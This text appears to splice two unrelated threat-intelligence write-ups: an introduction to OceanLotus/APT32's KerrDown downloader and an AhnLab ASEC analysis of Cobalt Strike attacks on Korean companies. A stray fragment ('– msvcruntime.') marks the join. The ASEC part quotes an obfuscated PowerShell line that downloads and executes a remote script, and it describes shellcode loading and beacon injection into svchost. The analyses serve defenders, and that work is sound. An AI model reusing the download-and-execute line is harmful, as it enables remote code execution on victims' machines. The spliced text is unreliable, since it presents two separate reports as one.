OceanLotus (AKA APT32) is a threat actor group known to be one of the most sophisticated threat actors originating out of Southeast Asia. Multiple attack campaigns have been reported by a number of security organizations in the last couple of years, documenting the tools and tactics used by the threat actor. While OceanLotus’ targets are global, their operations are mostly active within the APAC region, which encompasses targeting private sectors across multiple industries, foreign governments, activists, and dissidents connected to Vietnam.

This blog will cover a new custom downloader malware family we’ve named “KerrDown”, which OceanLotus have been actively using since at least early 2018. We also show how the Jaccard index algorithm was used to quickly find similarities between samples of the new KerrDown malware family within our datasets. This method has proven to be very useful for extracting similarities from large sample datasets and connecting attack campaigns together. Given the large number of “KerrDown” samples found, we were also able to discern possible patterns in OceanLotus’ working hours and days of the week, which is discussed in the later sections of this blog.

Our analysis shows that the primary targets of the ongoing campaign discussed in this blog are either in Vietnam or Vietnamese-speaking individuals. We identified two methods to deliver the KerrDown downloader to targets. One is using a Microsoft Office document with a malicious macro and the other is a RAR archive which contains a legitimate program with DLL side-loading. For RAR archive files, the file names used to trick targets are all in Vietnamese, as shown in Figure 11.

– msvcruntime.
The ASEC analysis team is monitoring attacks that utilize the Cobalt Strike hacking tool. In this article, the team will examine the latest Cobalt Strike attacks, which were confirmed after the publishing of the past article that introduced the Cobalt Strike hacking tool.

An attack confirmed on April 23 revealed that the Cobalt Strike beacon was run by the process that possesses the command line shown below.

Svchost.exe -k LocalServiceNetworkRestricted

Cobalt Strike threat actors usually designate and run a normal process after giving it a specific parameter, and then inject the actual backdoor beacon to disguise the attack as a normal process. This is a feature that is actually supported by the Cobalt Strike hacking tool.

Before the beacon process shown above was run, the following obfuscated PowerShell command line log was confirmed.

Powershell.exe “$dadf=’IEX(New-Object Net.WebClient).D’ $ien=’ownloadString (” hxxp://kr/api/runtime.ps1 ”)’ $nv3=’IEX(New-Object Net.WebClient).Do’ $qc=’wnloadString… (omitted)

The downloaded runtime.ps1 is actually Invoke-Shellcode.ps1, which is a PowerShell script provided by other PowerShell-based attack tools: PowerSploit and Empire. As its name suggests, Invoke-Shellcode has the feature of downloading the shellcode payload through a parameter and executing it. Thus, it is assumed that Cobalt Strike was installed through Invoke-Shellcode.ps1. The C2 domain that the shellcode connects to is ‘oxoocc’ on the bottom left. As of now, the page cannot be connected to and is showing the ‘404 Not Found’ message, meaning the team is unable to download the beacon to check its information.

AhnLab products are equipped with a process memory-based detection method and a behavior-based detection feature that can counter the beacon backdoor, which is used from Cobalt Strike’s initial invasion stage to spread internally.
Posted on Cobalt Strike Targeting Korean Companies Being Distributed (Part 2)